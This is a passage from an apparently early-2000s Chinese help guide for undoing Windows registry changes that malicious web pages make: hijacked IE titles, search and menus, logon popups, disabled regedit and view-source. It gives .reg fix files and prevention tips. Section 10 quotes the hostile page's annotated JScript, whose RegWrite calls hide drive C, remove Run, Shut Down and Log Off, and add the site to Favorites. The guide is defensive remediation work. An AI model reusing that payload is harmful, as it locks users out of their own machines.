HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title
　　解决办法：
　　①在Windows启动后，点击"开始"→"运行"菜单项，在"打开"栏中键入regedit，然后按"确定"键；
　　②展开注册表到
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main下，在右半部分窗口中找到串值"Window Title" ，将该串值删除即可，或将Window Title的键值改为"IE浏览器"等你喜欢的名字；
　　③同理，展开注册表到
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main,按②中所述方法处理。
　　④退出注册表编辑器，重新启动计算机，运行IE，即可

　　6、IE右键菜单被修改

　　受到修改的注册表项目为：
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt下被新建了网页的广告信息，并由此在IE右键菜单中出现！
　　解决办法：打开注册标编辑器，找到
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt，删除相关的广告条文，注意不要把下载软件FlashGet和Netants也删除掉，这两个是正常的。

    7、IE默认搜索引擎被修改

　　在IE浏览器的工具栏中有一个搜索引擎的工具按钮，可以实现网络搜索，被篡改后只要点击那个搜索工具按钮就会链接到那个篡改网站。出现这种现象的原因是以下注册表被修改：
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search\CustomizeSearch
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search\SearchAssistant
　　解决办法：
　　运行注册表编辑器，展开上述子键，将"CustomizeSearch"和"SearchAssistant"的键值改为某个搜索引擎的网址即可。

　　8、系统启动时弹出对话框

　　受到更改的注册表项目为：
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon在其下被建立了字符串"LegalNoticeCaption"和"LegalNoticeText"，其中"LegalNoticeCaption"是提示框的标题，"LegalNoticeText"是提示框的文本内容。它们的存在，得我们每次登陆到Windwos桌面前都出现一个提示窗口，显示那些网页的广告信息。
　　解决办法：打开注册表编辑器，找到
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon主键，在右边窗口中找到"LegalNoticeCaption"和"LegalNoticeText"这两个字符串，删除就可。

　　9、浏览网页注册表被禁用

　　这是由于注册表
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System下的DWORD值"DisableRegistryTools"被修改为"1"的缘故，将其键值恢复为"0"即可。
　　解决办法:用记事本程序建立以REG为后缀名的文件，将下面这些内容复制在其中就可以了：
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000000

　10、浏览网页开始菜单被修改

　　1)禁止"关闭系统" 　　2)禁止"运行"
　　3)禁止"注销" 　　4)隐藏C盘--你的C盘找不到了！
　　5)禁止使用注册表编辑器regedit 　　6)禁止使用DOS程序
　　7)使系统无法进入"实模式" 　　8)禁止运行任何程序
　　   
注：以下是该网页修改受害者的注册表项所用的招数
Shl.RegWrite （"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion
\\Policies\\Explorer\\NoRun", 01, "REG_BINARY"）;
注：使受害者系统没有“运行”项，这样用户就不能通过注册表编辑器来修改该有害网页对系统注册表的修改。
Shl.RegWrite （"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\Policies\\Explorer\\NoClose", 01, "REG_BINARY"）;
注：使受害者系统没有“关闭系统”项
Shl.RegWrite （"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\Policies\\Explorer\\NoLogOff", 01, "REG_BINARY"）;
注：使受害者系统没有“注销”项
Shl.RegWrite （"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\Policies\\Explorer\\NoDrives", "00000004", "REG_DWORD"）;
注：使受害者系统没有逻辑驱动器C
Shl.RegWrite （"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\Policies\\WinOldApp\\ Disabled","REG_BINARY"）;
注：禁止运行所有的DOS应用程序；
Shl.RegWrite （"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\Policies\ \WinOldApp\\NoRealMode","REG_BINARY"）;
注：使系统不能启动到“实模式”（传统的DOS模式）下；
又注：进入该网页，它还会修改以下的注册表项，使WINDOWS系统登录时显示一个登录窗口（在MicroSoft网络用户登录之前）
Shl.RegWrite （"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\Winlogon\\LegalNoticeCaption", "呜啦啦..."）;
注：这些代码会使窗口的标题是“呜啦啦…”
Shl.RegWrite （"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\Winlogon\\LegalNoticeText", "《呜啦啦...》
注：上面一行是会在窗口中显示出来的文字
注：下面两行代码修改注册表，使受害者所有的IE窗口都加上以下的标题：“呜啦啦…”
Shl.RegWrite （"HKLM\\Software\\Microsoft\\Internet Explorer\\Main\Window Title", "呜啦啦..."）;
Shl.RegWrite （"HKCU\\Software\\Microsoft\\Internet Explorer\\Main\Window Title", "呜啦啦..."）;
注：到上面一行为止，完成了对受害者的注册表的所有修改！
注：下面代码用来将其网页增加到受害者的收藏夹中
var WF, Shor, loc;
WF = FSO.GetSpecialFolder（0）;
loc = WF + "\\Favorites";
if（!FSO.FolderExists（loc））
{
loc = FSO.GetDriveName（WF） + "\\Documents and Settings\" + Net.UserName + "\\Favorites";
if（!FSO.FolderExists（loc））
{
return;
}
}

注：下面就是使其网页加入到你的收藏夹的具体代码
AddFavLnk（loc, "找到感觉www.findfeel.com", "http://www.findfeel.com"）

受害用户的修复方法：
　　1：对于Win9x用户，建议在电脑启动时按F8键，选择到MS-DOS方式下，使用Scanreg/restore命令来恢复以前备份的、正常的注册表。
　　2：对于Win2000用户，把以下内容copy下来，存为unlock.reg文件，选带命令行的安全模式，用命令regedit unlock.reg导入，如何重启机器就OK了。
unlock.reg文件内容如下：
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersionPolicies\Explorer]
"NoDriveTypeAutoRun"=dword:00000095
"NoRun"=hex:
"NoLogOff"=hex:
"NoDrives"=dword:00000000
"RestrictRun"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersionPolicies\System]
"DisableRegistryTools"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersionPolicies\System]
"DisableRegistryTools"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersionPolicies\WinOldApp]
"Disabled"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersionPolicies\WinOldApp]
"NoRealMode"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersionWinlogon]
"LegalNoticeCaption"=""
"LegalNoticeText"=""

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main]
"Window Title"="IE浏览器"

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Window Title"="IE浏览器"

　11、IE中鼠标右键失效
　　浏览网页后在IE中鼠标右键失效，点击右键没有任何反应！

　　12、查看""源文件"菜单被禁用

　　在IE窗口中点击"查看"→"源文件"，"源文件"菜单已经被禁用。具体的位置为：在注册表
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer下建子键"Restrictions"，然后在"Restrictions"下面建立两个DWORD值："NoViewSource"和"NoBrowserContextMenu"，并为这两个DWORD值赋值为"1"。
　　在注册表
HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Restrictions下，将两个DWORD值："NoViewSource"和"NoBrowserContextMenu"的键值都改为了"1"。
　　解决办法：
　　将以下内容另存为后缀名为reg的注册表文件，如unlock.reg，双击unlock.reg导入注册表，重新运行IE就会恢复正常。
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions]
"NoViewSource"=dword:00000000
"NoBrowserContextMenu"=dword:00000000
[HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Restrictions]
"NoViewSource"=dword:00000000
"NoBrowserContextMenu"=dword:00000000
　　要特别注意的是，在你编制的注册表文件unlock.reg中，"REGEDIT4"一定要大写，并且它的后面一定要空一行，还有，"REGEDIT4"中的"4"和"T"之间一定不能有空格，否则将前功尽弃！注意如果是Win2000或WinXP用户，请将"REGEDIT4"改为Windows Registry Editor Version 5.00。

二、预防办法

　　1、要避免中招，关键是不要轻易去一些自己并不了解的站点，特别是那些看上去美丽诱人的网址更不要贸然前往.

　　2、由于该类网页是含有有害代码的ActiveX网页文件，因此在IE设置中将ActiveX插件和控件、Java脚本等全部禁止就可以避免中招。
　　具体方法是：在IE窗口中点击"工具→Internet选项，在弹出的对话框中选择"安全"标签，再点击"自定义级别"按钮，就会弹出"安全设置"对话框，把其中所有ActiveX插件和控件以及Java相关全部选择"禁用"即可。不过，这样做在以后的网页浏览过程中可能会造成一些正常使用ActiveX的网站无法浏览。

　　3、对于Windows98用户，打开C:\WINDOWS\JAVA\Packages\CVLV1NBB.ZIP，把其中的"ActiveXComponent.class"删掉；对于WindowsMe用户，打开C:\WINDOWS\JAVAPackages\5NZVFPF1.ZIP，把其中的"ActiveXComponent.class"删掉。请放心，删除这个组件不会影响到你正常浏览网页的。

　　4、对于所有用户，都建议安装Norton AntiVirus 2002 v8.0杀毒软件，此软件已经把通过IE修改注册表的代码定义为Trojan.Offensive ，增加了Script Blocking功能，将对此类恶作剧进行监控，并予以拦截。

　　5、既然这类网页是通过修改注册表来破坏我们的系统，那么我们可以事先把注册表加锁：禁止修改注册表，可以达到预防的目的。
　　加锁方法如下：
　　(1)运行注册表编辑器regedit.exe；
　　(2)展开注册表到   HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System下，新建一个名为DisableRegistryTools的DWORD值，并将其值改为"1"，即可禁止使用注册表编辑器regedit.exe。
　　解锁方法如下：
　　用记事本编辑一个任意名字的.reg文件，如unlock.reg，内容如下：
REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000000
　　存盘，你就有了一把解锁的钥匙了！如果要使用注册表编辑器，则双击unlock.reg即可。注意如果你是Win2000或WinXP用户，请将"REGEDIT4"写为Windows Registry Editor Version 5.00。

　　6、对Win2000用户，还可以通过在Win2000下把服务里面的远程注册表操作服务"Remote Registry Service"禁用，来对付该类网页。具体方法是：点击"管理工具→服务→Remote Registry Service(允许远程注册表操作)"，将这一项禁用即可。

    7、虽然经过一番辛苦的劳动修改回了标题和默认连接首页，但如果以后又不小心进入该站就又得麻烦一次。可以在IE中做设置以便永远不进该站点：
　　打开IE，点击"工具"→"Internet选项"→"内容"→"分级审查"，点"启用"按钮，会调出"分级审查"对话框，然后点击"许可站点"标签，输入网站网址。
　　
    8、修改注册表后留后门，目的让你修改注册表好像成功，重新启动后又恢复到被修改的状态。
这主要是在启动项里留了后门，大家可以打开注册表到
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices
HKCU\Software\Microsoft\Windows\CurrentVersionRun-
看看有没有可疑的启动项目，这一点最多朋友忽略，哪些启动可疑呢？
我这里给出几个大家需要注意的,启动项里键值有出现.hml和.htm后缀的，最好都去掉，还有有.vbs后缀的 启动项也去掉，还有一个很重要的，如果有这一个启动项，出现有类似键值的，比如：
system 键值是regedit -s c:\windows……请注意，这个regedit -s 是注册表的一个后门参数，是用来导 入注册表的，这样的选项一定要去掉
还有一类修改会在c:\windows\产生.vbs后缀的文件，或是.dll文件，其实.dll文件实际是.reg文件,此时你要看看c:\windows\win.ini文件，看看load=，run=，这两个选项后面应该是空的，如果有其他程序 修改load=，run=，将=后面程序删除，删除前看看路径和文件名，删除后在到system下删除对应的文件
还有一种方法，大家如果屡次修改重启又恢复回去，可以搜索C盘下所有的.vbs文件，可能有隐藏的，用记 事本打开，看到里面有关于修改注册表的都把它删除或保险起见把后缀改掉，你可以按中恶意网页的病毒的 时间来搜索文件,
下面的这个漏洞大家非常值得注意，在启动IE时还有一个陷阱，就是IE主界面的工具的菜单里的广告，一定要去 掉，因为这些会在你启动IE时启动，所以你修改完其他的先别着急打开IE窗口，否则白费力气，方法：打开 注册表HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions看到广告就删，别留情
一个很重要的问题，在中了恶意网页的陷阱后一定要先清空IE所有临时文件，切记！